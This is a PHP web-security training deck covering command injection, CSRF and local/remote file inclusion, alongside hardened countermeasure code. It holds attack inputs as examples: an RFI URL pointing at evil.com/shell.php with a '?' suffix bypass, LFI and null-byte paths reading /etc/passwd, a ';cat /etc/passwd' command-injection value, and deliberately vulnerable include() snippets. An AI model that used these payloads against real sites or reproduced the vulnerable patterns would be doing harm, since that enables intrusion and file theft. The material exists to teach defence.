Hacking 4 Programmer - common attacks and counter measure ...

Published by Adzmely Mansor
Part 1: common exploitable vulnerabilities found in web applications and some countermeasures to prevent them.

My slides from a recent training for one university (IT staff) ... some of the solutions presented are merely examples ... may vary in different contexts ...

Examples/solutions presented are based on PHP ...

Part 2: hands-on setting up a WAF based on ModSecurity/OWASP-CRS with centralized logging using mlogc (will upload later, need to modify some slides, was customized for that university).

Published by: Adzmely Mansor on Jul 25, 2013
Copyright: Attribution Non-commercial
This is silly; hopefully nobody is doing it:

Code Injection Prevention

Never trust user input(s). Validate it against what you expect, then sanitize/encode it for the context it will be used in:
htmlentities / htmlspecialchars (encode output that goes into HTML; this stops XSS, not shell or SQL injection)
strip_tags (removes tags, but is not a reliable sanitizer on its own)
etc.

Code Injection Prevention

Avoid using system/exec/shell_exec if possible.
If you have to, make sure you validate user input against an allowlist and escape it with escapeshellarg() before it reaches the shell.
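As an added example (not code from the original slides), the "sanitize and validate before calling the shell" advice applied to a hypothetical "ping this host" feature. The parameter name host, the regex and the port used for the no-shell variant are assumptions for illustration:

```php
<?php
// Added example (not from the original slides): a hypothetical "ping this host" page.
// Assumed: $_GET['host'] comes straight from the user.

// Vulnerable: the user string is spliced into the command line, so
// host=8.8.8.8;cat /etc/passwd makes the shell run a second command.
function ping_vulnerable(string $host): ?string
{
    return shell_exec("ping -c 1 " . $host);
}

// Hostnames / IPv4 only: letters, digits, dots, hyphens, and no leading "-"
// so the value can never be parsed as an option (argument injection).
const HOST_PATTERN = '/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/';

// Hardened: allowlist-validate first, then escape anyway.
// Returns null when the input is rejected.
function ping_hardened(string $host): ?string
{
    if (!preg_match(HOST_PATTERN, $host)) {
        return null;
    }
    // escapeshellarg() single-quotes the value so the shell treats it as
    // exactly one argument, even if the validation above is loosened later.
    $cmd = 'ping -c 1 ' . escapeshellarg($host);
    return shell_exec($cmd);
}

// Better still: no shell at all. Here a plain TCP connect replaces the ping binary.
function host_reachable_no_shell(string $host, int $port = 80): bool
{
    if (!preg_match(HOST_PATTERN, $host)) {
        return false;
    }
    $errno = 0;
    $errstr = '';
    $fp = @fsockopen($host, $port, $errno, $errstr, 2);
    if ($fp === false) {
        return false;
    }
    fclose($fp);
    return true;
}

$host = $_GET['host'] ?? '';
header('Content-Type: text/plain');
$out = ping_hardened($host);
echo $out === null ? "rejected input\n" : $out;
```

The allowlist check is the real control; escapeshellarg() is a second layer in case the pattern is ever relaxed. Whenever a native function or library can do the job (here fsockopen), prefer it and drop the shell entirely.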

Cross Site Request Forgery - CSRF

Also known as "one-click attack" or "session riding".
Works by forcing/tricking an end user into executing unwanted actions on a web application in which he/she is currently authenticated.
Delivered through social engineering, such as sending a link via email/chat/etc.
Can compromise end-user data/operations and even the entire web application.

Ever seen a link like this:

and in fact the "id" values are in sequence:

session validation | user validation
        0          |        0
        0          |        1
        1          |        0
        1          |        1

Case 1: in some, if not most, cases there is NO
session checking for the authenticated user, and
no validation that the user is authorized.
You are authorized to delete your own "POST", but
knowing the "id" sequence number anybody can
delete a random "POST" of a random user.

NOT CSRF: this is a missing authorization check. The request comes straight from the attacker, not from a tricked victim, and it has to be fixed before CSRF protection even matters.
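As an added example (not code from the original slides), the "delete a POST" action from Case 1, first as the slide describes it (no checks) and then with both checks from the session/user validation table. The schema posts(id, user_id, body), the session key user_id and the in-memory SQLite database are assumptions for illustration:

```php
<?php
// Added example (not from the original slides). Assumed schema: posts(id, user_id, body);
// assumed that login stores the user's id in $_SESSION['user_id'];
// SQLite in memory stands in for the real database.

declare(strict_types=1);

// Case 1: neither session validation nor user validation.
// Anyone who can guess the sequential id deletes anyone's post.
function delete_post_case1(PDO $pdo, int $id): bool
{
    $stmt = $pdo->prepare('DELETE FROM posts WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->rowCount() === 1;
}

// Session validation = 1, user validation = 1.
// Ownership is a condition of the DELETE itself, so there is no gap between
// "check who owns it" and "delete it", and no second query to get wrong.
function delete_post_checked(PDO $pdo, ?int $current_user, int $id): bool
{
    if ($current_user === null) {
        return false;                                   // not logged in
    }
    $stmt = $pdo->prepare('DELETE FROM posts WHERE id = ? AND user_id = ?');
    $stmt->execute([$id, $current_user]);
    return $stmt->rowCount() === 1;                     // 0 rows: not yours (or already gone)
}

// --- demo with constructed data ---
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL, body TEXT)');
$pdo->exec("INSERT INTO posts (id, user_id, body) VALUES (1, 10, 'alice post'), (2, 20, 'bob post')");

// In a real handler: $current_user = $_SESSION['user_id'] ?? null;
$current_user = 10;                                     // Alice is logged in

var_dump(delete_post_checked($pdo, $current_user, 2));  // Bob's post: must be refused
var_dump(delete_post_checked($pdo, null, 1));           // no session: must be refused
var_dump(delete_post_checked($pdo, $current_user, 1));  // her own post: allowed
var_dump(delete_post_case1($pdo, 2));                   // Case 1 lets Alice delete Bob's post
```

Putting the owner in the WHERE clause also means a guessed id for someone else's row returns "0 rows affected" rather than leaking whether the row exists, which a separate SELECT-then-DELETE would do.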

Case 2: do things the right way, but no CSRF protection:
session checking for the authenticated user
validate as the authorized user
The attacker no longer needs to guess anything on the server side; he/she only needs you to open a link while you are logged in, e.g. sent over chat:

Bro check this out, Rainbow ABC

POST method will not save you ... !!!

Click for More

Switching the action from GET to POST only changes how the attacker builds the forged request (a hidden form submitted automatically, or by a button such as "Click for More", instead of a plain link); the browser still attaches the victim's session cookie to that POST.

Famous CSRF attacks....

INGDirect.com: able to transfer funds out of a user's bank account...
YouTube.com: added videos to a user's "Favourites", flagged videos as inappropriate, etc....
etc.

SOURCE: https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/

CSRF Preventions - user level
Users can mitigate CSRF risk by:
logging out when done (a forged request without a live session does nothing)
not using "Remember Me"

CSRF Preventions - web site countermeasures
CSRF token in all forms (every state-changing request), verified on the server
limiting the lifetime of session cookies
(today also: set the session cookie's SameSite attribute, which makes the browser withhold it from cross-site POSTs (Lax) or from all cross-site requests (Strict))

CSRF token - using the (PHP) NoCSRF class

<?php
// Tokens are stored in the session, so you
// have to initialize session data first
session_start();
// Then include the NoCSRF class
require_once('nocsrf.php');

// Generate a CSRF token to use in the form's hidden field
$token = NoCSRF::generate('csrf_token');
?>

<form name="csrf_form" action="#" method="post">
    <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($token, ENT_QUOTES, 'UTF-8'); ?>">
    ...Other form inputs...
    <input type="submit" value="Send form">
</form>

SOURCE: https://github.com/BKcore/NoCSRF

CSRF token - using the (PHP) NoCSRF class, checking the token when the form is submitted

<?php
try {
    // Run the CSRF check on POST data, in exception mode,
    // with a validity of 10 minutes, in one-time mode.
    NoCSRF::check('csrf_token', $_POST, true, 60*10, false);
    // form parsing, DB inserts, etc.
} catch (Exception $e) {
    // CSRF attack detected
    // discard request
}
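As an added example (not from the original slides, and not the NoCSRF library's code), a minimal synchronizer-token implementation so the mechanism behind NoCSRF::generate/check is visible: a random per-session token, a 10-minute lifetime, constant-time comparison and one-time use. It reuses the field name csrf_token from the slide; the session key csrf and the form action are assumptions:

```php
<?php
// Added example (not from the original slides, not the NoCSRF library):
// a hand-rolled synchronizer token. Assumed: sessions are enabled and the
// token lives under $_SESSION['csrf'].

declare(strict_types=1);

const CSRF_TTL = 600;   // seconds: same 10-minute validity as the NoCSRF example

// Create (or reuse) a token bound to this session, recording when it was made.
function csrf_token(): string
{
    if (!isset($_SESSION['csrf']) || time() - $_SESSION['csrf']['t'] > CSRF_TTL) {
        $_SESSION['csrf'] = ['v' => bin2hex(random_bytes(32)), 't' => time()];
    }
    return $_SESSION['csrf']['v'];
}

// Verify the token sent with a state-changing request. hash_equals() compares
// in constant time so an attacker cannot learn the token byte by byte.
// One-time mode: the stored token is discarded after a single check.
function csrf_verify(array $request): bool
{
    $stored = $_SESSION['csrf'] ?? null;
    $sent   = $request['csrf_token'] ?? null;
    if ($stored === null || !is_string($sent)) {
        return false;
    }
    $ok = hash_equals($stored['v'], $sent) && (time() - $stored['t'] <= CSRF_TTL);
    unset($_SESSION['csrf']);       // burn it whether or not it matched
    return $ok;
}

session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    // ... perform the delete / transfer / etc. only after the token validated ...
    exit('ok');
}

// GET: render the form with the hidden field. A forged cross-site POST cannot
// carry this value because the attacker's page cannot read our session or
// this HTML, which is exactly why "POST alone" does not help but a token does.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form action="" method="post">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="hidden" name="id" value="42">
  <button type="submit">Delete</button>
</form>
HTML;
```

Regenerate the token (and the session id) on login so a token issued to an anonymous session cannot be carried over into an authenticated one.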

File Inclusion Exploit

Local/Remote File Inclusion
Allows an attacker to include a local/remote file into the running script.
Possible because user-supplied input reaches include/require without proper validation.

Local/Remote File Inclusion can lead to
code execution on the web server
code execution on the client side through JavaScript, and so to other attacks such as XSS - Cross Site Scripting
Denial of Service (DoS)
Data Theft/Manipulation

LFI/RFI Examples:

<?php
// This is obviously bad.. !
// the "page" parameter goes straight into include()
if (isset($_GET['page'])) {
    include($_GET['page']);
}
?>

Remote File Inclusion (RFI):
/vulnCode.php?page=http://evil.com/shell.php
(including a URL only works when allow_url_include is On in php.ini; it is Off by default since PHP 5.2, keep it that way)
Local File Inclusion (LFI):
/vulnCode.php?page=/etc/passwd

LFI/RFI Examples:

<?php
// How about appending ".php"?
// (still bad: the suffix can be bypassed, see below)
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
}
?>

LFI/RFI Examples, with ".php" appended:
Remote File Inclusion (RFI):
/vulnCode.php?page=http://evil.com/shell.php?
  the trailing "?" makes the appended ".php" part of the remote URL's query string, so the server still fetches http://evil.com/shell.php
Local File Inclusion (LFI):
/vulnCode.php?page=/tmp/phpcode
  works when the attacker has already placed a file /tmp/phpcode.php on the server (e.g. through an upload)
/vulnCode.php?page=/etc/passwd%00
  Null-Byte Injection: %00 terminates the path in the underlying C string, so ".php" is dropped and /etc/passwd is included
  (PHP 5.3.4 and later reject paths containing a null byte, so this particular bypass only works on older versions)
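As an added example (not code from the original slides), two safe ways to implement the "?page=" pattern the vulnerable snippets above get wrong: a fixed allowlist of page names, and, when the set of pages is dynamic, a strict name check followed by a realpath() containment check. The pages/ directory, the page names and the name regex are assumptions for illustration:

```php
<?php
// Added example (not from the original slides). Assumed layout: page templates
// live under ./pages/ and every allowed page is listed explicitly.
// Assumed php.ini: allow_url_include=Off (the default), so include() cannot fetch URLs at all.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// 1) Allowlist: map the user-visible name to a file you chose. Anything not in
//    the map (paths, URLs, null bytes, "../", a trailing "?") is simply unknown.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page_allowlist(string $page): ?string
{
    return isset(PAGES[$page]) ? PAGES_DIR . '/' . PAGES[$page] : null;
}

// 2) Dynamic set of pages: validate the name strictly, then confirm the resolved
//    file is inside PAGES_DIR. realpath() follows symlinks and collapses "..",
//    so the prefix check is done on the real location, not on the input string.
function resolve_page_realpath(string $page): ?string
{
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $page)) {
        return null;                                // no "/", ".", "\0", ":" ...
    }
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;                                // missing file or missing base dir
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                // resolved outside the pages dir
    }
    return $real;
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page_allowlist($page);              // or resolve_page_realpath($page)
if ($file === null) {
    http_response_code(404);
    exit('no such page');
}
include $file;
```

Prefer the allowlist whenever the set of pages is known at deploy time; the realpath() variant is the fallback for genuinely dynamic content, and its name regex is what keeps every bypass on the slide (URL, absolute path, %00, trailing "?") from ever reaching the filesystem.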
